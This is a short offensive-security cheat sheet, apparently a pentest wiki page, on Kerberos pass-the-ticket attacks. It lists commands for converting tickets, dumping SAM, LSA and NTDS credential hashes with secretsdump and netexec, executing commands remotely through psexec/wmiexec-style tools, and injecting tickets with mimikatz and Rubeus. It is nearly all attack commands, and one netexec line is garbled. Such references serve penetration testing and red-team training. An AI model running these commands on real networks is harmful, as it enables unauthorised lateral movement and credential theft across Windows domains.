Pass The Ticket

Ticket conversion


# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache

# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi

Linux

Exporting ticket

export KRB5CCNAME=$path_to_ticket.ccache

Export hashes

secretsdump.py -k $TARGET

netexec smb $TARGETS -k --sam
netexec smb $TARGETS -k --lsa
netexecETS -k --ntds

Command execution


psexec.py -k 'DOMAIN/USER@TARGET'
smbexec.py -k 'DOMAIN/USER@TARGET'
wmiexec.py -k 'DOMAIN/USER@TARGET'
atexec.py -k 'DOMAIN/USER@TARGET'
dcomexec.py -k 'DOMAIN/USER@TARGET'

netexec winrm $TARGETS -k -x whoami
netexec smb $TARGETS -k -x whoami

.\PsExec.exe -accepteula \\$TARGET cmd

Windows

The most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.

# use a .kirbi file
kerberos::ptt $ticket_kirbi_file

# use a .ccache file
kerberos::ptt $ticket_ccache_file

Rubeus.exe ptt /ticket:"base64 | file.kirbi"

PreviousOverpass the hash NextShadow Credentials

Last updated 4 months ago

hashtagTicket conversion

hashtagLinux

hashtagWindows

Ticket conversion

Linux

Windows